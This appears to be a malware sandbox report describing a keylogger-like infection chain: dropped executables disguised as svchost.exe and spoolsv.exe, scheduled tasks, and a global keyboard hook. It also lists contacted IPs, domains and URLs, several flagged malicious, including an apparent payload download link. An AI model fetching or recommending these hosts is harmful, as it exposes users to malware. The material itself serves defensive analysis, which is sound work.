spoolsv.exe (36)
  Dropped: C:\Windows\System\svchost.exe, PE32
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Drops executables to the windows directory (C:\Windows) and starts them; 2 other signatures
  Started: svchost.exe (40)

svchost.exe (40)
  Dropped: C:\Users\user\AppData\Local\stsys.exe, PE32
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Drops executables to the windows directory (C:\Windows) and starts them; 2 other signatures
  Started: spoolsv.exe (44); at.exe (47); at.exe (49); 11 other processes (51)

spoolsv.exe (44)
  Signatures: Installs a global keyboard hook

at.exe (47)
  Started: conhost.exe (53)

at.exe (49)
  Started: conhost.exe (55)

11 other processes (51)
  Started: conhost.exe (57); conhost.exe (59); conhost.exe (61); 7 other processes (63)

Graph legend (icon meanings): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet. IP-count shading: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs.

Contacted Public IPs

IP             | Domain                             | Country       | ASN    | ASN Name                            | Malicious
103.67.236.191 | demo.sdssoftltd.co.uk              | India         | 135779 | OASISGSSERVICES-ASOASISGSSERVICESIN | true
74.125.143.82  | googlecode.l.googleusercontent.com | United States | 15169  | GOOGLEUS                            | false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
www.postphenomenon.com 35.186.238.101 true
demo.sdssoftltd.co.uk 103.67.236.191 true
googlecode.l.googleusercontent.com 74.125.143.82 true
www.slymwhite.com unknown unknown
vccmd03.googlecode.com unknown unknown
vccmd01.t35.com unknown unknown
vccmd01.googlecode.com unknown unknown
vccmd02.googlecode.com unknown unknown
vccmd01.zxq.net unknown unknown

Contacted URLs

Name                                                                               | Malicious | Antivirus Detection   | Reputation
http://vccmd03.googlecode.com/files/cmsys.gif                                      | false     | Avira URL Cloud: safe | unknown
https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78    | true      |                       | unknown
http://vccmd02.googlecode.com/files/cmsys.gif                                      | false     | Avira URL Cloud: safe | unknown
http://vccmd01.googlecode.com/files/cmsys.gif                                      | false     | Avira URL Cloud: safe | unknown
www.evolvekitchendesign.com/ffw/                                                   | true      | Avira URL Cloud: safe | low